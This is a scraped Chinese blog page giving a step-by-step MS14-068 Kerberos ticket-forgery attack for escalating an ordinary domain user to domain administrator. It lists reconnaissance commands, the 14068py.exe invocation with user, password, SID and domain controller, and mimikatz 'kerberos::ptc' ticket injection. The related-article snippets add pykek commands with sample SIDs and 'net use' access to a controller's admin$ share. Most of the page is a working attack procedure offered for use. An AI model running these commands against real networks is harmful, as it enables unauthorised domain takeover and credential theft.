内网拓展——域渗透之ms-14-068利用

最新推荐文章于 2022-08-26 17:46:03 发布
最新推荐文章于 2022-08-26 17:46:03 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/105208831
版权

ms-14-068票据伪造获取域管账号密码

实验条件:

 1.必须知道域
 2.必须知道域的账号密码
 3.sid
 4.域控

实验步骤:

一、利用ms-14-068漏洞进行票据伪造

1.获取普通域用户的sid

whoami /all

2.获取域名和域控名

ipconfig /all
net view /domain或net time /domain

3.上传14068py.exe,输入命令进行票据伪装,生成TGT文件

14068py.exe -u 域用户全名 -p "密码" -s sid -d 域控名全称

4.清除票据记录,清除成功

5.上传mimikatz.exe,输入以下命令使用刚才伪装的票据

mimikatz.exe "kerberos::ptc xxxxx" exit
xxxxx处替换刚才生成的TGT文件名

  

最低0.47元/天 解锁文章
没有如果ru果
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS14_068利用
weixin_45682070的博客
05-25 487
假设已经获得TargetShell,并且在环境中并未打ms14_068的相关补丁 接下来我们进行利用 通过上篇文章的信息搜集(https://blog.csdn.net/weixin_45682070/article/details/106337762) 首先GitHub上下载ms14_068的利用脚本pykek python ms14-068.py -u whale@DC.com -s S-1-5-21-2867916317-3317112163-957300651-1113 -d 192.168.17
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
ms14-068利用工具包.zip
07-01
包含了minikatazx64位,以及MS14-068.exe和ms14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳
MS14-068 (CVE-2014-6324)用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7346
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个内的普通账户可以利用此漏洞进行权限提升,升级为管理员权限。 二、漏洞原理 Kerberos认证原理:http
MS14-068提权和impacket工具包提权
Unknowncheats的博客
02-07 266
ms14-068提权工具利用a)拿下边界机win7,并已经有win7上任意一个账号的密码-u 用户名@-p 用户密码-s 用户sid-d 控ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com生成一个ccache后缀票据导入票据导入之前,清空票据缓存kerberos::purge kerberos::ptc 票据使...
渗透渗透.pdf
08-07
目录 工作组& 渗透姿势 MS14-068 致谢
「漏洞分析」游走于内之后——工控安全那些事儿 - 数据安全.zip
11-28
「漏洞分析」游走于内之后——工控安全那些事儿 - 数据安全 WEB应用防火墙 解决方案 安全管理 安全威胁 开发安全
渗透之——数据压缩、传输
01-09
利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 -r包括子目录 -m 设置压缩比  -m0 存储 添加到压缩文件时不压缩文件。  -m1 最快 ...
渗透——内转发之利用ftp实现文件传输
01-09
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于...
[ 内渗透 ] 渗透技术实战指南(渗透一条龙).rar
最新发布
02-11
[ 内渗透 ] 渗透技术实战指南(渗透一条龙)
【MS14-068漏洞复现】
一纸荒芜的博客
08-26 3233
ms14-068漏洞复现
通过 Cobalt Strike 利用 ms14-068
weixin_30737363的博客
11-19 808
拓扑图 攻击者(kali) 位于 192.168.245.0/24 段,环境位于 192.168.31.0/24 段。 中有一台 win7 有两张卡,可以同时访问两个段,以这台机器作为跳板机进入环境。 假设现在已经有一组用户的账号密码 user1 321!@#qwe 获取用户的 sid whoami /user 下面使用 pykek 生成票据,首先用 cs 开一个 socks...
MS14-068权限提升漏洞利用
cj_Hydra's Blog
02-15 1741
前言: 在写该篇文章之前,本人已经写过了关于渗透之黄金票据和白银票据的利用方式,今天的内容也是关于渗透提权的利用,并且MS14-068这个exp也是由kerberos协议而来。 在实际的渗透过程中,获得了一个成员(非管理员)的账号后,如果刚好控机器未打补丁(KB3011780)这是官方给出的修复补丁,那么就可以利用MS14-068该exp来快速获得控权限。 利用方式: 1:用户和密码 ...
MS14_068提权漏洞复现
ninnjnjn的博客
04-02 715
MS14_068提权漏洞复现 1.漏洞说明 该漏洞可能允许攻击者将未授权的用户账户的权限,提权到管理员的权限 2.漏洞原理 3.漏洞利用前提 (1)控主机没有打MS14_068的补丁 (2)攻击者拿下了一台内主机的普通计算机,并获得普通用户名以及密码/hash值,和用户的suid 4.实验环境 控主机windows 2008R2 192.168.164.55 内主机windows ...
渗透之——渗透利用ms-14-068漏洞进行票据伪装获取管账号密码
wsnbbz的博客
03-31 2524
条件 知道名,sid,并拥有一个普通用户的账号密码和并知道控的名称 名获取: ipconfig /all sid获取: whoami /all 查询控: net time /domain 利用过程 1.利用该漏洞伪装票据 2.导出hash 3.破解文件 利用该漏洞伪装票据 1.拿到一台普通用户机器,获取sid 2.名,控名获取 (...
渗透---ms14068
yc的博客
05-24 2803
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、MS14-068的利用条件?二、利用步骤1.查看服务器是否打补丁2.获取用户的sid值3.删除系统票据4.生成票据5.导入票据6.提权利用总结 前言 ms14-068漏洞主要通过伪造管的TGT,将普通用户权限提权为管权限,以此来控制控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的控服务器中,都可进行利用。 一、MS14-068的利用条件? 1、获取普通用户的账号密码.
复现ms-14-068票据
qfslyy的博客
12-19 393
** 复现ms-14068票据注入提权步骤 个人笔记,欢迎指导讨论 ** 此时登录的用户是里面的mmy用户 查看本机SID 查看控计算机全名 验证成员是否能访问控 可以看到拒绝访问,成员此时没有权限访问控文件 把相关工具包拖进来之后 运用mimikatz工具清空它的票据,可以看到已经成功了 接下来扫描ms14-068漏洞,查看系统是否打了补丁 扫描结果什么都没有,所以确定没有打补丁,可以利用ms14-068漏洞进行攻击 程序执行完成后,在ms14-068文件夹里生成了一个票据文件
内提权之MS14-068
good good study
03-17 4689
目标:普通成员——>管理员 漏洞利用前提 控没有打MS14-068的补丁(KB3011780) 拿下一台加入的计算机 有这台内计算机的用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 控,开启了防火墙 win7(192.168.10.5),成员 1. win7获取账户的密码及sid值 win7机器上查看管理员,可发现,并没有自己 这里使用mimikatz去抓取用户的明文密码 mimikatz.exe "privilege:....
MS14-068漏洞进行提权
mingyqf的博客
02-24 1706
参考:https://blog.csdn.net/qq_37683287/article/details/120450044 server2008有效 MS14068是一个能够使普通用户提权到控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。 第一步:利用MS14-068伪造生成TGT 第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书 kerberos::ptc TGT_test@moonsec.fbi.ccache 第三步:获取管理员权限。创建
授权渗透实践:利用MS14-68漏洞操控内
作者注意到控未打上KB3011780补丁,因此利用Mimikatz工具(一个强大的Windows安全工具集)和MS14-068漏洞exploit来获取控的系统信息,包括清除内存中的Kerberos票据。 接下来,作者通过执行`whoami/all`命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值